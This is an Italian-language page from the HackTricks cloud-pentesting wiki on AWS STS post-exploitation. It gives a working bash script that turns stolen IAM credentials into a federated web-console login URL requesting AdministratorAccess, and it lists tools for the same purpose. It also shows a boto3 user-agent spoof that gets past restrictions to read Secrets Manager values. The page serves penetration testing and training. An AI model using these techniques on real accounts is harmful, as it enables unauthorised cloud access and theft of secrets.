# AWS - STS Post Exploitation {{#include ../../../banners/hacktricks-training.md}} ## STS Per ulteriori informazioni: {{#ref}} ../aws-services/aws-iam-enum.md {{#endref}} ### Da credenziali IAM alla Console Se sei riuscito a ottenere alcune credenziali IAM, potresti essere interessato a **accedere alla console web** utilizzando i seguenti strumenti.\ Nota che l'utente/ruolo deve avere il permesso **`sts:GetFederationToken`**. #### Script personalizzato Il seguente script utilizzerà il profilo predefinito e una posizione AWS predefinita (non gov e non cn) per fornirti un URL firmato che puoi utilizzare per accedere alla console web: ```bash # Get federated creds (you must indicate a policy or they won't have any perms) ## Even if you don't have Admin access you can indicate that policy to make sure you get all your privileges ## Don't forget to use [--profile ] in the first line if you need to output=$(aws sts get-federation-token --name consoler --policy-arns arn=arn:aws:iam::aws:policy/AdministratorAccess) if [ $? -ne 0 ]; then echo "The command 'aws sts get-federation-token --name consoler' failed with exit status $status" exit $status fi # Parse the output session_id=$(echo $output | jq -r '.Credentials.AccessKeyId') session_key=$(echo $output | jq -r '.Credentials.SecretAccessKey') session_token=$(echo $output | jq -r '.Credentials.SessionToken') # Construct the JSON credentials string json_creds=$(echo -n "{\"sessionId\":\"$session_id\",\"sessionKey\":\"$session_key\",\"sessionToken\":\"$session_token\"}") # Define the AWS federation endpoint federation_endpoint="https://signin.aws.amazon.com/federation" # Make the HTTP request to get the sign-in token resp=$(curl -s "$federation_endpoint" \ --get \ --data-urlencode "Action=getSigninToken" \ --data-urlencode "SessionDuration=43200" \ --data-urlencode "Session=$json_creds" ) signin_token=$(echo -n $resp | jq -r '.SigninToken' | tr -d '\n' | jq -sRr @uri) # Give the URL to login echo -n "https://signin.aws.amazon.com/federation?Action=login&Issuer=example.com&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2F&SigninToken=$signin_token" ``` #### aws_consoler Puoi **generare un link alla console web** con [https://github.com/NetSPI/aws_consoler](https://github.com/NetSPI/aws_consoler). ```bash cd /tmp python3 -m venv env source ./env/bin/activate pip install aws-consoler aws_consoler [params...] #This will generate a link to login into the console ``` > [!WARNING] > Assicurati che l'utente IAM abbia il permesso `sts:GetFederationToken`, o fornisci un ruolo da assumere. #### aws-vault [**aws-vault**](https://github.com/99designs/aws-vault) è uno strumento per memorizzare e accedere in modo sicuro alle credenziali AWS in un ambiente di sviluppo. ```bash aws-vault list aws-vault exec jonsmith -- aws s3 ls # Execute aws cli with jonsmith creds aws-vault login jonsmith # Open a browser logged as jonsmith ``` > [!NOTE] > Puoi anche usare **aws-vault** per ottenere una **sessione della console del browser** ### **Evitare le restrizioni dell'User-Agent da Python** Se c'è una **restrizione nell'eseguire determinate azioni basate sull'user agent** utilizzato (come limitare l'uso della libreria python boto3 in base all'user agent), è possibile utilizzare la tecnica precedente per **connettersi alla console web tramite un browser**, oppure puoi direttamente **modificare l'user-agent di boto3** facendo: ```bash # Shared by ex16x41 # Create a client session = boto3.Session(profile_name="lab6") client = session.client("secretsmanager", region_name="us-east-1") # Change user agent of the client client.meta.events.register( 'before-call.secretsmanager.GetSecretValue', lambda params, **kwargs: params['headers'].update({'User-Agent': 'my-custom-tool'}) ) # Perform the action response = client.get_secret_value(SecretId="flag_secret") print(response['SecretString']) ``` {{#include ../../../banners/hacktricks-training.md}}